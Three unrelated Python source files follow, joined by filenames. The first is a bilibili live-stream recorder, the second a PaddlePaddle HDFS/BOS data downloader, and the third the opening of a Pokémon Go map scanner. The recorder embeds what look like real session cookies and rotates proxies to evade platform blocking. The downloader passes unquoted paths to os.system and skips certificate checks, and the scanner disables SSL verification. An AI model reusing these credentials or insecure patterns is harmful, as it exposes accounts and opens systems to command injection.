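# that are new, and removes rooms whose ex flag is still 0. It is only driven by
# synMonitor(), whose call in run() is currently commented out.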
def checkuser():
global aRooms
while True:
#print('check run')
for i in open("user.txt","r").read().splitlines():
if(i):
sameid = 0
for room in aRooms:
if(int(i) == room.nRoom):
sameid =1
room.ex = 1
#room.sameid = 1
break
if(sameid == 1):
continue
else:
print('find new id:%s.' % i)
room = Room(int(i));
room.sameid = 1
room.ex = 1
#room.getInfo();
aRooms.append(room)
for room in aRooms:
if(room.ex == 0):
print("{}end".format(room.nRoom))
aRooms.remove(room)
room.sameid = 0
room.ex = 0
time.sleep(5)
def synMonitor(aIds=None, aUsers=None):
global log
global wait
global aRooms;
global INTERVAL;
if (not aIds): aIds = [];
if (not aUsers): aUsers = [];
aRooms = [];
if (not os.path.exists('user.txt')):
with open("user.txt","a") as f:
for sId in aIds:
sId = sId.strip();
if (sId):
f.writelines(sId)
f.write('\n')
f.close
else:
for sId in aIds:
sId = sId.strip();
if (sId):
sameid = 0
for i in open("user.txt","r").read().splitlines():
if (i == sId):
sameid = 1
break
if(sameid == 1):
continue
else:
with open("user.txt","a") as r:
r.writelines(sId)
r.write('\n')
r.close
for sId in open("user.txt","r").read().splitlines():
sId = sId.strip();
if (sId):
room = Room(int(sId));
#room.getInfo();
aRooms.append(room);
for sUser in aUsers:
sUser = sUser.strip();
if (sUser):
room = Room(None, int(sUser));
if (room.getRoomByUser()):
room.getInfo();
aRooms.append(room);
#for room in aRooms:
#display('id: {}\nUser: {}\nroom: {}\nstatus: {}\n'.format(room.nId, room.sUser, room.sTitle, room.sStatus))
print('check interval: {}s'.format(INTERVAL));
ck = threading.Thread(target=checkuser,name=("check"),daemon=True)
ck.start()
while True:
for room in aRooms:
if(room.checkthread and room.checkthread.is_alive()):
pass
else:
print('new checkthread {} running'.format(room.nRoom))
checkThread = threading.Thread(target=checkrun,
name=str(room.sUser),
args=(room,),
daemon=True
)
room.checkthread=checkThread
checkThread.start()
wait(INTERVAL);
def checkrun(room):
if str(room.nRoom) in recording:
return
recording.append(str(room.nRoom))
#x = 1
#prepare(room)
isOn = (room.getInfo() == 'on');
display('id: {}\nUser: {}\nroom: {}\nstatus: {}\n'.format(room.nId, room.sUser, room.sTitle, room.sStatus))
'''
if (room.thread and room.thread.is_alive()):
sProcess = room._stream.getvalue();
print('{} downloading process: {}'.format(room.nId, sProcess));
'''
if(room.sameid == 0):
return
#if(isOn and x==1):
# x=0
#else:
# isOn = (room.getInfo() == 'on');
if(isOn):
print('{} starting download process...'.format(room.nId));
'''
downThread = threading.Thread(
target=doDownload,
name=str(room.nId),
args=(room,),
daemon=True
);
room.thread = downThread;
downThread.start();
'''
doDownload(room)
if str(room.nRoom) in recording:
recording.remove(str(room.nRoom))
else:
if str(room.nRoom) in recording:
recording.remove(str(room.nRoom))
gc.collect()#pass
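# newgetonline() polls the followed-anchors live API with the account's
# access_key through one of the verified proxies, and for every live room that
# is both listed in /root/u/user.txt and not already in `recording` it starts a
# checkrun() thread to record it.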
def newgetonline():
global cookies
count = 0
firstnew=1
s=requests.session()
s.keep_alive = False
headers={"APP-KEY": "iphone","Accept": "*/*","Accept-Encoding": "gzip","Accept-Language": "zh-cn","Buvid": "a3ed675c322d0d658f8a0e69711fb011","Display-ID": "1836737-1562074723","ENV": "prod","User-Agent": "bili-universal/8680 CFNetwork/976 Darwin/18.2.0",}
'''
headers={
"Connection":"close",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36",
"Accept":"*/*",
"Referer":"https://space.bilibili.com/1836737/fans/follow",
"Accept-Encoding":"gzip, deflate, br",
"Accept-Language":"zh-CN,zh;q=0.9,ja;q=0.8"}
cookies={
"Cookie": "DedeUserID=1836737; DedeUserID__ckMd5=326caeb00bc9daa3; SESSDATA=20accd85%2C1566356211%2C0d93fe71; bili_jct=f10fa7a864b930767ec42e4f42968c4a; sid=4hbm9tko; Buvid=a3ed675c322d0d658f8a0e69711fb011; LIVE_BUVID=AUTO1915506501046439; buvid3=FC7A064A-214F-42CD-A34B-E62B8E670B1248780infoc; finger=50e304e7; Hm_lvt_8a6e55dbd2870f0f5bc9194cddf32a02=1557239028"
}
'''
s.headers.update(headers)
s.cookies.update(cookies)
#proxies = None#getip('国内')
while not streamip:
time.sleep(1)
ip = streamip[random.randint(0,len(streamip) - 1)]
proxies = {'https':ip,'http':ip}
print("getrec",proxies)
while True:
xx = time.time()
try:
t=1
#url = 'http://api.live.bilibili.com/relation/v1/feed/feed_list?page={}&pagesize=30'.format(t)
#url = f"https://api.live.bilibili.com/xlive/app-interface/v1/relation/liveAnchor?access_key={access_key}&&build=8680&device=phone&device_name=iPhone%208&filterRule=0&mobi_app=iphone&platform=ios&qn=0&sign=9f94e7fbbcbbdb375d75d631512ad5ba&sortRule=1&statistics=%7B%22appId%22%3A1%2C%22version%22%3A%225.44.1%22%2C%22abtest%22%3A%22716%22%2C%22platform%22%3A1%7D&ts=1562074989"
url = f"http://api.live.bilibili.com/xlive/app-interface/v1/relation/liveAnchor?access_key={access_key}&actionKey=appkey&appkey=27eb53fc9058f8c3&build=8910&device=phone&device_name=iPhone%208&filterRule=0&mobi_app=iphone&platform=ios&qn=0&sign=0f9c9e3978d6bde09f2621d03c51269e&sortRule=1&statistics=%7B%22appId%22%3A1%2C%22version%22%3A%225.48.2%22%2C%22abtest%22%3A%22890_886_519%22%2C%22platform%22%3A1%7D&ts={int(time.time())}"#1562074989"
with s.get(url,proxies=proxies,timeout=3) as req:
res=req.json()
data=res.get('data')
online= []
infos={}
if not data:
contents = 'bilibili cookies expired'
print(res)
subject = 'bilibili'
send_mail(subject,contents,password)
time.sleep(60)
else:
online.extend(str(m['roomid']) for m in data['rooms'])
for m in data['rooms']:
infos.update({str(m['roomid']):{'uname':m['uname'],'title':m['title'],'playurl':m['playurl']}})
'''
while data.get('list'):
#online.extend([str(m['roomid']) if str(m['roomid']) == m['link'].split('/')[-1] else m['link'].split('/')[-1] for m in data['list']])
#online.extend([m['link'].split('/')[-1] for m in data['list']])
online.extend(str(m['roomid']) for m in data['list'])
for m in data['list']:
infos.update({str(m['roomid']):{'uname':m['uname'],'title':m['title']}})
t+=1
url = 'http://api.live.bilibili.com/relation/v1/feed/feed_list?page={}&pagesize=30'.format(t)
data = s.get(url,proxies=proxies,timeout=10).json().get('data')
'''
f=open('/root/u/user.txt','r')
uids=list(set(f.read().splitlines()))
wanted = [m for m in list(set(online)) if (m in uids and m not in recording)]
if len(wanted):
if firstnew:
print('rec list updated')
firstnew=0
continue
sys.stdout.write("\033[K")
print('rec',len(wanted),wanted)
for user in wanted:
room = Room(int(user),sUser=infos[user]['uname'],sTitle=infos[user]['title'],sUrl=None)#infos[user]['playurl'])
thread = threading.Thread(target = checkrun,name=infos[user]['uname'],args = (room,),daemon = True)
thread.start()
if testt == '1':
thread.join()
f.close()
except Exception as e:
print(e)
if streamip:
ip = streamip[random.randint(0,len(streamip) - 1)]
else:
oip = allips.pop(0)
ip = oip['proxy']
allips.append(oip)
print(ip)
proxies = {'https':ip,'http':ip}
#print(req)
print("getrec",proxies)
if '403' in str(e):
getcookies()
yy = time.time()
if 'f' in locals():
f.close()
print('')
sys.stdout.write('\033[K')
sys.stdout.write('\033[F')
print('\nrec updated',yy-xx,'s')
'''
if count<=0:
count=5
snapshot = tracemalloc.take_snapshot()
top_stats = snapshot.statistics('lineno')
for stat in top_stats[:2]:
sys.stdout.write('\033[K')
print(stat)
sys.stdout.write('\033[2A')
else:
count-=1
'''
sys.stdout.write('\033[F')
sys.stdout.write('\033[F')
time.sleep(random.randint(0,2))
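# getfollow() walks the account's follow tags (it keeps the tags named 直播 and
# 舞蹈), resolves every followed mid to a live room id via getRoomInfoOld, and
# appends unseen room ids to /root/u/user.txt; already checked mids are
# remembered in /root/u/checked_fmid.txt. The per-mid lookups run on an asyncio
# loop backed by thread pools (get_spider / _request / get_header).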
def getfollow():
global cookies
headers ={
"Connection":"close",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36",
"Accept":"*/*",
"Referer":"https://space.bilibili.com/1836737/fans/follow",
"Accept-Encoding":"gzip, deflate, br",
"Accept-Language":"zh-CN,zh;q=0.9,ja;q=0.8"}
'''
cookies={
"Cookie": "DedeUserID=1836737; DedeUserID__ckMd5=326caeb00bc9daa3; SESSDATA=20accd85%2C1566356211%2C0d93fe71; bili_jct=f10fa7a864b930767ec42e4f42968c4a; sid=4hbm9tko; Buvid=a3ed675c322d0d658f8a0e69711fb011; LIVE_BUVID=AUTO1915506501046439; buvid3=FC7A064A-214F-42CD-A34B-E62B8E670B1248780infoc; finger=50e304e7; Hm_lvt_8a6e55dbd2870f0f5bc9194cddf32a02=1557239028"
}
'''
s = requests.session()
s.keep_alive = False
s.headers.update(headers)
s.cookies.update(cookies)
if streamip:
ip = random.choice(streamip)
else:
ip = None
proxies = {'http':ip}
while True:
try:
curl='http://api.bilibili.com/x/relation/tags'
with s.get(curl,proxies=proxies,timeout=10) as r:
cdata = r.json()['data']
flist = [m['tagid'] for m in cdata if (m['name'] =='直播' or m['name']=='舞蹈')]
break
except:
print('get tags error,use old')
flist = [96907,114130]
break
time.sleep(10)
while True:
x=time.time()
fmid=[]
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
thread_pool = concurrent.futures.ThreadPoolExecutor(max_workers=10)
_process_pool = concurrent.futures.ThreadPoolExecutor(max_workers=10)
atasks = []
try:
for i in flist:
t=1
furl = 'http://api.bilibili.com/x/relation/tag?mid=1836737&tagid={}&pn={}&ps=50'.format(i,t)
with s.get(furl,proxies=proxies,timeout=10) as res:
fdata = res.json()
fdata = fdata['data']
while fdata:
fmid.extend([m['mid'] for m in fdata])
t+=1
furl = 'http://api.bilibili.com/x/relation/tag?mid=1836737&tagid={}&pn={}&ps=50'.format(i,t)
with s.get(furl,proxies=proxies,timeout=10) as res:
fdata = res.json()['data']
fmid = list(set(fmid))
with open('/root/u/checked_fmid.txt','a+') as f:
f.seek(0)
checked_fmid = f.read().splitlines()
f2 = open ('/root/u/user.txt','r+')
uids=list(set(f2.read().splitlines()))
for i in fmid:
if str(i) not in checked_fmid:
atasks.append(get_spider(i,loop,thread_pool,f2,uids,_process_pool,s))
if atasks:
loop.run_until_complete(asyncio.wait(atasks))
y=time.time()
sys.stdout.write('\033[K')
print('follow update',y-x,'s')
sys.stdout.write('\033[F')
except Exception as e:
#print(fdata)
#traceback.print_exc()
if streamip:
ip = random.choice(streamip)
else:
ip = get_proxy()
proxies ={'http':ip}
#print(e)
print('getfollow',proxies)
if 'f2' in locals():
f2.close()
loop.close()
thread_pool.shutdown()
_process_pool.shutdown()
time.sleep(random.randint(1,3))
async def get_spider(i,loop,thread_pool,f2,uids,_process_pool,s):
rurl = 'http://api.live.bilibili.com/room/v1/Room/getRoomInfoOld?mid={}'.format(i)
data = await loop.run_in_executor(thread_pool,functools.partial(_request,rurl,s))
await loop.run_in_executor(_process_pool,functools.partial(get_header,data,f2,uids,i))
def _request(rurl,s):
proxyg = {}
t = 10
while t:
try:
with s.get(rurl,proxies=proxyg,allow_redirects=False,timeout=10) as res:
return res.json()['data']
except Exception:
ip = get_proxy()
proxyg={'https':ip,'http':ip}#getip('国内')
sys.stdout.write('\rget loopreq '+ip)
sys.stdout.flush()
return None
def get_header(data,f2,uids,i):
if data:
roomid = str(data['roomid'])
else:
roomid = None
#live = 'https://live.bilibili.com/'+roomid
'''
live = sAPI4.format(oroomid)
fake = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36' }
try:
jsons= requests.get(live,headers=fake,allow_redirects=False).json()
rdata=jsons['data']
#if rheader.get('Location'):
# roomid = rheader['Location'].split('/')[-1]
roomid = str(rdata['short_id'] if rdata['short_id'] else rdata['room_id'])
except:
print(oroomid,jsons)
return
'''
if roomid:
if roomid not in uids:
with open ('/root/u/user.txt','a') as f2:
f2.write(roomid +'\n')
with open ('/root/u/checked_fmid.txt','a+') as ff:
ff.seek(0)
if str(i) not in ff.read().splitlines():
print(i,'written')
ff.write(str(i)+'\n')
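# check_useful() keeps the streamip list populated: 50 mythread workers pull
# proxies from the pool's /get_all/ endpoint and keep only those that can fetch
# a playUrl response whose durl does not point at the live-ws CDN.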
def check_useful():
global allips
print('checking usable proxies')
queue = Queue.Queue()
for i in range(50):
t = mythread(queue)
t.daemon = True
t.start()
retryck = 0
while True:
while len(streamip) > 10 or retryck > 0:
sys.stdout.write("\r\033[Kusable proxies left: "+str(len(streamip)))
time.sleep(5)
retryck -= 1
retryck = 60
ips = None
while not ips:
try:
with requests.get("http://127.0.0.1:5010/get_all/",timeout = 5) as res:
ips = res.json()
except:
time.sleep(0.1)
allips = ips
for ip in ips:
queue.put(ip.get('proxy'))
queue.join()
ipnum = len(streamip)
if ipnum > 5:  # only alert when the pool of usable proxies runs low
continue
subject = "bilibili"
contents = "only {} usable proxies left, please check".format(ipnum)
send_mail(subject,contents,password)
sys.stdout.write("\r\033[Kusable proxies: "+str(ipnum)+" total: "+str(len(allips)))
#time.sleep(20)
class mythread(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self.queue=queue
def run(self):
url = 'http://api.live.bilibili.com/room/v1/Room/playUrl?cid=279430&otype=json&platform=web&qn=4'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'Referer': 'https://live.bilibili.com/279430'}
while 1:
iip = self.queue.get()
#print(self.queue.qsize(),iip)
proxies = {'http':iip}
try:
nogood=1
r = requests.get(url,headers=headers,proxies = proxies,timeout = (3,5),allow_redirects=False)
rjson = r.json()
if rjson['data']['accept_quality']:
nogood = 0
durl = str(rjson['data']['durl'])
if 'live-ws' in durl:
nogood = 1
if nogood:
if iip in streamip:
streamip.remove(iip)
else:
if not iip in streamip:
streamip.append(iip)
except Exception as e:
#print(e)
if iip in streamip:
streamip.remove(iip)
finally:
if 'r' in locals():
r.close()
self.queue.task_done()
def run():
global ROOMS
global USERS
sIds = ROOMS or '';
aIds = sIds.split(',');
sUsers = USERS or '';
aUsers = sUsers.split(',');
#synMonitor(aIds, aUsers);
gf = threading.Thread(target=getfollow,name = "getfollow",daemon=True)
gf.start()
ch_us = threading.Thread(target=check_useful,name="checkip",daemon=True)
ch_us.start()
newgetonline()
def parseArg():
global ROOMS, USERS, FILEDIR, DEBUGLEVEL, SCRIPT, COMMAND, INTERVAL
global log
parser = argparse.ArgumentParser(description='simultaneously monitor status of plural rooms at live.bilibili.com, and download streaming ones');
parser.add_argument('-r', '--room',
help='IDs of rooms to listen, separated by comma'
);
parser.add_argument('-u', '--user',
help='IDs of users who host the rooms to listen, separated by comma'
);
parser.add_argument('-d', '--dir',
help='directory to be downloaded into'
);
parser.add_argument('-v', '--verbose',
action='store_true',
help='show verbose debug information'
);
parser.add_argument('-s', '--script',
help='python scripts to be executed after a successful download; the downloaded file path will be passed as the first script argument ( sys.argv[1] )'
);
parser.add_argument('-c', '--command',
help='the command to be executed after a successful download; the downloaded file path will replace "{0}" within the command, using format syntax ( COMMAND.format(FILEPATH) )'
);
parser.add_argument('-i', '--interval',
type=int,
help='the interval, in seconds, between each status poll round'
);
args = parser.parse_args();
ROOMS = '{},{}'.format(ROOMS or '', args.room or '');
USERS = '{},{}'.format(USERS or '', args.user or '');
FILEDIR = args.dir or FILEDIR or '';
#if (args.verbose):
# DEBUGLEVEL = logging.DEBUG;
#else:
# DEBUGLEVEL = logging.INFO;
#log.setLevel(DEBUGLEVEL);
SCRIPT = args.script or SCRIPT or '';
COMMAND = args.command or COMMAND or '';
INTERVAL = args.interval or INTERVAL or 20;
print('passed command line arguments: {}'.format(
{key: value for (key, value) in vars(args).items() if value is not None}
));
return True;
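# getcookies() shells out to bilibili.py to refresh config.toml, then parses the
# account cookie string out of it (bili_jct, DedeUserID, DedeUserID__ckMd5, sid,
# SESSDATA) and picks up the access_token used by newgetonline().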
def getcookies():
global cookies
global access_key
while 1:
try:
os.system("python3 bilibili.py")
try:
config = toml.load('config.toml')
except:
print("failed to load config.toml")
return
line = config['user']['account'].splitlines()[0]
pairs={}
for pair in line.strip(";").split(";"):
if len(pair.split("=")) == 2:
key, value = pair.split("=")
pairs[key] = value
cookie = all(key in pairs for key in ["bili_jct", "DedeUserID", "DedeUserID__ckMd5", "sid", "SESSDATA"])
cookies={'cookie':";".join(f"{key}={value}" for key, value in pairs.items() if key in ["bili_jct", "DedeUserID", "DedeUserID__ckMd5", "sid", "SESSDATA"])}
access_key = pairs['access_token']
return cookies
except:
pass
def main():
try:
parseArg();
getcookies()
run();
except KeyboardInterrupt as e:
display('\nexiting...');
if __name__ == '__main__':
main();
|
downloader.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle.distributed.fleet.utils.fs import HDFSClient
import time
import paddle.distributed.fleet as fleet
import socket
import sys
import hashlib
from .barrier_server_impl import BarrierServer
from .barrier_client_impl import BarrierClient
from .env import is_first_worker, get_node_info
import sysconfig
import multiprocessing
import yaml
import os
def net_is_used(port, ip='127.0.0.1'):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
s.shutdown(2)
return True
except:
return False
def get_md5(file_path):
hash_md5 = hashlib.md5()
with open(file_path, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
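# filelist.txt is expected to contain "<filename> <md5>" per line. check_exists()
# returns True when any wanted file is missing locally or has a stale md5, and
# get_file_shard() slices the full list round-robin so node `node_id` of
# `node_num` gets every node_num-th file.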
def check_exists(filelist, local_path):
with open("{}/filelist.txt".format(local_path), 'r') as fin:
for line in fin:
current_file = line.split(' ')[0]
current_md5 = line.split(' ')[1].strip()
if current_file in filelist:
if (not os.path.exists("{}/{}".format(
local_path, current_file))) or get_md5("{}/{}".format(
local_path, current_file)) != current_md5:
return True
return False
def get_file_shard(node_id, node_num, local_path):
while not os.path.exists('{}/filelist.txt'.format(local_path)):
time.sleep(3)
full_list = []
with open("{}/filelist.txt".format(local_path), 'r') as fin:
for line in fin:
full_list.append(line.split(' ')[0])
return full_list[node_id::node_num]
class Downloader(object):
def __init__(self):
self.need_barrier = False
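# An illustrative fs_yaml for download_from_hdfs. The keys are the ones read by
# the method below; the values are placeholders, not a real cluster config:
#
#   hadoop_home: /opt/hadoop            # or taken from $HADOOP_HOME / `which hadoop`
#   fs.default.name: hdfs://namenode:9000
#   hadoop.job.ugi: username,password
#   java_home: /opt/jdk                 # optional, exported as JAVA_HOME
#   data_path: /remote/dir/containing/filelist.txt/and/meta.txt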
def download_from_hdfs(self,
fs_yaml=None,
local_path="./",
shard_num=-1,
shard_id=-1,
process_num=10):
"""
Download from hdfs
The configurations are configured in fs_yaml file:
An illustrative example of the yaml fields read here is sketched in the comment above this method.
"""
def multi_download(client,
hdfs_path,
local_path,
filelist,
process_num=process_num):
def _subprocess_download(files):
for ff in files:
client.download('{}/{}'.format(hdfs_path, ff),
'{}/{}'.format(local_path, ff))
cmd = "tar -xf {}/{} -C {}".format(local_path, ff,
local_path)
os.system(cmd)
dir_per_process = len(filelist) / process_num
procs = []
for i in range(process_num):
process_filelist = filelist[i::process_num]
p = multiprocessing.Process(
target=_subprocess_download, args=(process_filelist, ))
procs.append(p)
p.start()
for proc in procs:
proc.join()
if os.environ.get('PADDLE_TRAINER_ENDPOINTS') is not None:
endpoints = os.environ.get('PADDLE_TRAINER_ENDPOINTS').split(",")
current_endpoint = os.environ.get('PADDLE_CURRENT_ENDPOINT')
self.server_endpoint = endpoints[0]
self.server_port = int(self.server_endpoint.split(":")[1])  # net_is_used() needs an integer port
self.barrier_server = BarrierServer()
if current_endpoint == self.server_endpoint:
while net_is_used(self.server_port):
time.sleep(3)
self.barrier_server.start_server_in_background(
endpoint=self.server_endpoint, worker_endpoints=endpoints)
self.need_barrier = True
if is_first_worker():
if not os.path.exists(local_path):
os.system('mkdir {}'.format(local_path))
_, ext = os.path.splitext(fs_yaml)
assert ext in ['.yml', '.yaml'], "only support yaml files for now"
with open(fs_yaml) as f:
cfg = yaml.load(f, Loader=yaml.Loader)
if "hadoop_home" in cfg:
self.hadoop_home = cfg["hadoop_home"]
elif "HADOOP_HOME" in os.environ:
self.hadoop_home = os.environ['HADOOP_HOME']
elif os.system('which hadoop') == 0:
path = os.popen("which hadoop").readlines()[0].rstrip()
self.hadoop_home = os.path.dirname(os.path.dirname(path))
if self.hadoop_home:
print("HADOOP_HOME: " + self.hadoop_home)
if "fs.default.name" in cfg and "hadoop.job.ugi" in cfg:
self.hdfs_configs = {
"fs.default.name": cfg["fs.default.name"],
"hadoop.job.ugi": cfg["hadoop.job.ugi"]
}
java_home = ''
if "java_home" in cfg:
java_home = cfg['java_home']
os.environ['JAVA_HOME'] = java_home
if "data_path" in cfg:
hdfs_path = cfg["data_path"]
else:
raise Exception("ERROR: Please configure your data path in AFS.")
client = HDFSClient(self.hadoop_home, self.hdfs_configs)
if is_first_worker():
if not (client.is_exist('{}/meta.txt'.format(hdfs_path)) and
client.is_exist('{}/filelist.txt'.format(hdfs_path))):
raise Exception(
"ERROR: Your data dir should include filelist.txt and meta.txt"
)
if not os.path.exists('{}/filelist.txt'.format(local_path)):
client.download('{}/filelist.txt'.format(hdfs_path),
'{}/filelist.txt'.format(local_path))
if not os.path.exists('{}/meta.txt'.format(local_path)):
client.download('{}/meta.txt'.format(hdfs_path),
'{}/meta.txt'.format(local_path))
with open('{}/meta.txt'.format(local_path), 'r') as fin:
for line in fin:
current_file = line.strip()
if not os.path.exists('{}/{}'.format(local_path,
current_file)):
client.download(
'{}/{}'.format(hdfs_path, current_file),
'{}/{}'.format(local_path, current_file))
if shard_num > 0:
assert shard_id >= 0, "Please provide worker index by fleet.worker_index() if you want to download sharded data on each machine"
self.filelist = get_file_shard(shard_id, shard_num, local_path)
need_download = check_exists(self.filelist, local_path)
if need_download:
multi_download(client, hdfs_path, local_path, self.filelist)
else:
if is_first_worker():
self.filelist = get_file_shard(0, 1, local_path)
need_download = check_exists(self.filelist, local_path)
if need_download:
multi_download(client, hdfs_path, local_path,
self.filelist)
if self.need_barrier:
client = BarrierClient()
client.server_endpoint = self.server_endpoint
client.my_endpoint = os.environ.get('PADDLE_CURRENT_ENDPOINT')
client.connect()
client.barrier()
if client.my_endpoint == self.server_endpoint:
time.sleep(10)
self.barrier_server.close_server()
return local_path
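# download_from_bos() works the same way as download_from_hdfs(), but fetches
# filelist.txt, meta.txt and the tarred shards over HTTP with wget; its yaml only
# needs a `bos_path` field pointing at the BOS directory (and fs_yaml may itself
# be a URL, in which case it is downloaded first).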
def download_from_bos(self,
fs_yaml=None,
local_path="./",
shard_num=-1,
shard_id=-1,
process_num=10):
def multi_download(bos_path,
local_path,
filelist,
process_num=process_num):
def _subprocess_download(files):
for ff in files:
os.system("wget -q -P {} --no-check-certificate {}/{}".
format(local_path, bos_path, ff))
cmd = "tar -xf {}/{} -C {}".format(local_path, ff,
local_path)
os.system(cmd)
dir_per_process = len(filelist) / process_num
procs = []
for i in range(process_num):
process_filelist = filelist[i::process_num]
p = multiprocessing.Process(
target=_subprocess_download, args=(process_filelist, ))
procs.append(p)
p.start()
for proc in procs:
proc.join()
if os.environ.get('PADDLE_TRAINER_ENDPOINTS') is not None:
endpoints = os.environ.get('PADDLE_TRAINER_ENDPOINTS').split(",")
current_endpoint = os.environ.get('PADDLE_CURRENT_ENDPOINT')
self.server_endpoint = endpoints[0]
self.server_port = int(self.server_endpoint.split(":")[1])  # net_is_used() needs an integer port
self.barrier_server = BarrierServer()
if current_endpoint == self.server_endpoint:
while net_is_used(self.server_port):
time.sleep(3)
self.barrier_server.start_server_in_background(
endpoint=self.server_endpoint, worker_endpoints=endpoints)
self.need_barrier = True
if is_first_worker():
if not os.path.exists(local_path):
os.system('mkdir {}'.format(local_path))
yaml_file = fs_yaml.split('/')[-1]
if not os.path.exists(yaml_file):
if fs_yaml is None:
raise Exception(
"Error: you should provide a yaml to download data from bos; you can find yaml examples in the following links:"
)
if is_first_worker():
os.system("wget -q --no-check-certificate {}".format(fs_yaml))
if not os.path.exists(yaml_file):
raise Exception(
"Error: If you provide a url, please check that it is valid and accessible; otherwise, please check that the yaml file exists in your local path."
)
else:
while not os.path.exists(yaml_file):
time.sleep(1)
_, ext = os.path.splitext(fs_yaml)
assert ext in ['.yml', '.yaml'], "only support yaml files for now"
with open(yaml_file) as f:
cfg = yaml.load(f, Loader=yaml.Loader)
if 'bos_path' in cfg:
bos_path = cfg["bos_path"]
else:
raise Exception("ERROR: Please configure your data path in BOS.")
if is_first_worker():
try:
os.system(
"wget -q -P {} --no-check-certificate {}/filelist.txt".
format(local_path, bos_path))
os.system("wget -q -P {} --no-check-certificate {}/meta.txt".
format(local_path, bos_path))
except:
raise Exception(
"ERROR: Your data dir should include filelist.txt and meta.txt"
)
with open('{}/meta.txt'.format(local_path), 'r') as fin:
for line in fin:
current_file = line[:-1]
os.system("wget -q -P {} --no-check-certificate {}/{}".
format(local_path, bos_path, current_file))
if shard_num > 0:
assert shard_id >= 0, "Please provide worker index by fleet.worker_index() if you want to download sharded data on each machine"
self.filelist = get_file_shard(shard_id, shard_num, local_path)
need_download = check_exists(self.filelist, local_path)
if need_download:
multi_download(bos_path, local_path, self.filelist)
else:
if is_first_worker():
self.filelist = get_file_shard(0, 1, local_path)
need_download = check_exists(self.filelist, local_path)
if need_download:
multi_download(bos_path, local_path, self.filelist)
if self.need_barrier:
client = BarrierClient()
client.server_endpoint = self.server_endpoint
client.my_endpoint = os.environ.get('PADDLE_CURRENT_ENDPOINT')
client.connect()
client.barrier()
if client.my_endpoint == self.server_endpoint:
time.sleep(10)
self.barrier_server.close_server()
return local_path
|
example.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import flask
from flask import Flask, render_template
from flask_googlemaps import GoogleMaps
from flask_googlemaps import Map
from flask_googlemaps import icons
import os
import re
import sys
import struct
import json
import requests
import argparse
import getpass
import threading
import werkzeug.serving
import pokemon_pb2
import time
import functools  # needed by the @memoize decorator defined below
from google.protobuf.internal import encoder
from google.protobuf.message import DecodeError
from s2sphere import *
from datetime import datetime
from geopy.geocoders import GoogleV3
from gpsoauth import perform_master_login, perform_oauth
from geopy.exc import GeocoderTimedOut, GeocoderServiceError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import ConnectionError
from requests.models import InvalidURL
from transform import *
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = \
'https://sso.pokemon.com/sso/login?service=https://sso.pokemon.com/sso/oauth2.0/callbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
APP = 'com.nianticlabs.pokemongo'
with open('credentials.json') as file:
credentials = json.load(file)
PTC_CLIENT_SECRET = credentials.get('ptc_client_secret', None)
ANDROID_ID = credentials.get('android_id', None)
SERVICE = credentials.get('service', None)
CLIENT_SIG = credentials.get('client_sig', None)
GOOGLEMAPS_KEY = credentials.get('gmaps_key', None)
SESSION = requests.session()
SESSION.headers.update({'User-Agent': 'Niantic App'})
SESSION.verify = False
global_password = None
global_token = None
access_token = None
DEBUG = True
VERBOSE_DEBUG = False # if you want to write raw request/response to the console
COORDS_LATITUDE = 0
COORDS_LONGITUDE = 0
COORDS_ALTITUDE = 0
FLOAT_LAT = 0
FLOAT_LONG = 0
NEXT_LAT = 0
NEXT_LONG = 0
auto_refresh = 0
default_step = 0.001
api_endpoint = None
pokemons = {}
gyms = {}
pokestops = {}
numbertoteam = { # At least I'm pretty sure that's it. I could be wrong and then I'd be displaying the wrong owner team of gyms.
0: 'Gym',
1: 'Mystic',
2: 'Valor',
3: 'Instinct',
}
origin_lat, origin_lon = None, None
is_ampm_clock = False
# stuff for in-background search thread
search_thread = None
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
def parse_unicode(bytestring):
decoded_string = bytestring.decode(sys.getfilesystemencoding())
return decoded_string
def debug(message):
if DEBUG:
print '[-] {}'.format(message)
def time_left(ms):
s = ms / 1000
(m, s) = divmod(s, 60)
(h, m) = divmod(m, 60)
return (h, m, s)
def encode(cellid):
output = []
encoder._VarintEncoder()(output.append, cellid)
return ''.join(output)
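# getNeighbors() returns 21 level-15 S2 cell ids: the cell containing the current
# position plus 10 neighbours before and 10 after it along the Hilbert curve,
# which is the area covered by one heartbeat request.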
def getNeighbors():
origin = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
walk = [origin.id()]
# 10 before and 10 after
next = origin.next()
prev = origin.prev()
for i in range(10):
walk.append(prev.id())
walk.append(next.id())
next = next.next()
prev = prev.prev()
return walk
def f2i(float):
return struct.unpack('<Q', struct.pack('<d', float))[0]
def f2h(float):
return hex(struct.unpack('<Q', struct.pack('<d', float))[0])
